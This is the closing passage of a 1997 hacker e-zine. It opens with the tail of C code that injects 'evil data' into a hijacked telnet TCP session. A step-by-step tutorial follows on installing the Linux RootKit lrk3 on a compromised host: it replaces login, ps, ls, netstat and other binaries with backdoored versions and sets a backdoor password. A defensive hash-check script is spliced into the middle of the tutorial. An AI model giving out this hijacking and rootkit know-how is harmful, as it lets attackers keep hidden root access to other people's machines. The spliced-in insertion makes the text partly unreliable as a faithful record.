  printf("  Sending evil data.\n");
  transmit_TCP(fd_send, evil_data,0,0,sizeof(evil_data),CLIENT,CLIENT_P,
               SERVER,23,serv_ack,serv_seq,ACK|PSH);

  count=0;
  printf("  Waiting for evil data to be confirmed...\n");
  while(count<5)
    {
    wait_packet(fd_receive,&attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0);
    if(attack_info.ack==serv_ack+sizeof(evil_data))
      count=PERSONAL_TOUCH;
    else
      count++;
    };
  if(count!=PERSONAL_TOUCH)
    {printf("Phase 3 unsuccessfully ended.\n"); exit(0);}
  printf("Phase 3 ended.\n");
}

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. Using LinuxRootKitIII : suid
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Rooting machines is just half the fun; the whole point of owning something is
being able to keep root for as long as possible. To do this, many kind people
have released what are known as root kits. There are currently root kits
available for a plethora of operating systems, e.g.
Linux, SunOS, and FreeBSD. What a root kit does is install many backdoored and
trojanised programs to replace the existing programs which are used to perform
the basic tasks of the host you owned. These tasks include logging in, listing
files, listing processes and so on.

This article focuses on a Linux system, mainly because these are the ones most
generally rooted by the masses. There are a few versions of the rootkit around.
The main two you should have are LinuxRootKitIII and LinuxRootKitII. You should
have both 2 and 3 because they are for different kinds of Linux machine.
Generally, LinuxRootKitII (a.k.a. lrk2) is for older Linux kernels (in the 1.x
range) and LinuxRootKitIII (a.k.a. lrk3) is for the newer Linux 2.x kernels.

It should be noted somewhere in this article that you need to have owned
(rooted) the machine _before_ you try and install the rootkit; installing it
as a non-root user won't work, and won't help you root the machine at all.
Also it should be noted that you shouldn't 'test' lrk2/lrk3 on your own
machine as it will probably just fuck you up.

Ok, now comes the part I like. To use lrk2 or 3 you need a few things: a Linux
box of the correct kernel version, root on that machine, and that machine
needs to be able to compile. Once you have that it's not a big problem. I'll
take you through it step by step.

1. Upload the lrk of the correct type, remembering that it's lrk2 for 1.x
   kernels and lrk3 for 2.x kernels. To find out what kernel the remote host
   is, type "uname -a" at the prompt; the number with the 2 radix points is
   the kernel version.

   Example:

   [root@sploitable root] # uname -a
   Linux sewid.org 2.0.29 #1 Sat Mar 22 17:39:12 EST 1997 i586

   Ex1. This is a Linux 2.0.29 kernel machine.

   Uploading the proper root kit can be easily done by ftp'ing to your remote
   machine and uploading it that way into some directory on a device with
   sufficient room to store lrk uncompressed (lrk3 is over 3mb uncompressed).
   To check how much space each device has, type df.

2. Untar/gzip it. This can easily be done by chdir'ing to wherever you
   uploaded it last step, then executing the following command:

   [root@sploitable root] # tar -zxvf LRKIII.tar.gz

3. Make it. Linux root kits are quite user friendly, provided the installation
   goes according to plan. To make the root kit, chdir to wherever it was
   untarred to (e.g. in lrk3 you would type "cd lrk3" from the directory you
   untarred it from) and back up your existing binaries. To do this it's best
   to know where they are. Here's a list of the binaries' existing locations
   on a common Linux system. You should copy all of these as shown.

   /bin/login
   /usr/bin/passwd
   /bin/ps
   /bin/ls
   /bin/netstat
   /usr/bin/du
   /usr/bin/top
   /usr/bin/rsh
   /sbin/ifconfig
   /usr/bin/chsh
   /usr/bin/chfn
   /usr/sbin/inetd

   If one of these files isn't on your system, or not in the directory
   mentioned above, try to find it using the 'whereis' command.

   Example:

   [root@sploitable lrk3] # whereis inetd
   inetd: /etc/inetd.conf /usr/lbin/inetd /usr/man/man8/inetd.8

   Bingo, you found inetd hiding in /usr/lbin.

   I suggest copying all of these to a directory called bin_bak or something
   under your lrk dir. Something like "cp /bin/ls ./bin_bak" for all of them
   is a good start.

   Ok, now you've taken precautions, modify the rootkit.h file that is in the
   lrk directory. The minimum you should change is the default rootkit
   password:

   Example:

   #define ROOTKIT_PASSWORD "lrkr0x"

   Change this to...

   #define ROOTKIT_PASSWORD "code-0"

   Or anything you want that is *6 CHARACTERS LONG*. Ok, that's it. Now
   you're ready to compile; this part is taken care of by the make file. All
   you need to do is type:

   "make all install"

   The make file takes all the source, compiles it, and places the new
   backdoored binaries into all the right places for you.

It should be noted that once backdoored you should _NEVER_ attempt to change
your rootkit password with the 'passwd' command. The root password is NOT THE
SAME AS YOUR ROOTKIT PASSWORD.
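The list of binaries the rootkit replaces is also the defender's checklist: a hash baseline of exactly those files, taken from a known-good host (or the distribution's packages) and kept off the box, shows a swapped login, ps or ls even when the trojaned copies keep the original size and date. This is an added example written for this section, not code from the article or from lrk; it assumes a POSIX shell with either sha256sum or shasum available.

```shell
#!/bin/sh
# Added example, not part of the original article or of lrk itself:
# baseline-and-compare integrity check for the binaries the article says
# lrk2/lrk3 replaces. Run the comparison from a trusted environment (rescue
# media or a clean copy of the tools), since a rooted box's own ls and ps
# are exactly the programs that have been swapped out.

# Binaries listed in the article as replaced by the rootkit.
LRK_BINARIES="/bin/login /usr/bin/passwd /bin/ps /bin/ls /bin/netstat
/usr/bin/du /usr/bin/top /usr/bin/rsh /sbin/ifconfig /usr/bin/chsh
/usr/bin/chfn /usr/sbin/inetd"

# hash_file FILE: SHA-256 of FILE (coreutils or BSD tool, whichever exists).
hash_file() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum < "$1" | cut -d' ' -f1
  else
    shasum -a 256 < "$1" | cut -d' ' -f1
  fi
}

# make_baseline ROOT MANIFEST: write "hash path" for each listed binary that
# exists under ROOT (ROOT is "" on a live system, or the mount point of a
# clean image). Store MANIFEST somewhere the checked host cannot modify.
make_baseline() {
  root=$1; manifest=$2
  : > "$manifest"
  for b in $LRK_BINARIES; do
    if [ -f "$root$b" ]; then
      printf '%s %s\n' "$(hash_file "$root$b")" "$b" >> "$manifest"
    fi
  done
}

# count_tampered ROOT MANIFEST: report MODIFIED/MISSING entries on stderr and
# print the number of them on stdout (0 means every listed binary matches).
count_tampered() {
  root=$1; manifest=$2; n=0
  while read -r hash path; do
    if [ ! -f "$root$path" ]; then
      echo "MISSING  $path" >&2; n=$((n + 1))
    elif [ "$(hash_file "$root$path")" != "$hash" ]; then
      echo "MODIFIED $path" >&2; n=$((n + 1))
    fi
  done < "$manifest"
  echo "$n"
}
```

A baseline taken after the rootkit is already installed is worthless, which is why the manifest has to come from a clean image or package files rather than from the suspect host.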
You may be able to log into the system by typing "root" at the login prompt
and then some password at the password prompt, but this is a BACKDOOR; it does
not mean the root password is the same as the one you put in rootkit.h.

Happy Ownership.

suid 1997.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Well, that was issue 1, hope y'all liked it, don't forget to visit...

http://micros0ft.paranoia.com
http://www.crackhouse.com
http://www.mastaz.org/codezero/
http://ulticonn.dyndns.com/codezero/

And that ends everything, sorry if we spent a little too long straightening
some shit out with sIn, but you deserve to know the truth...

Until next time, when there will be 950 days until the year 2000...

The CodeZero.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Remember, Mcdonalds Owns You, And Ronald Is The KinG!!!
Wendy Is Satan!! Don't Believe The Lies!! PHEAR WENDY!@#*

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ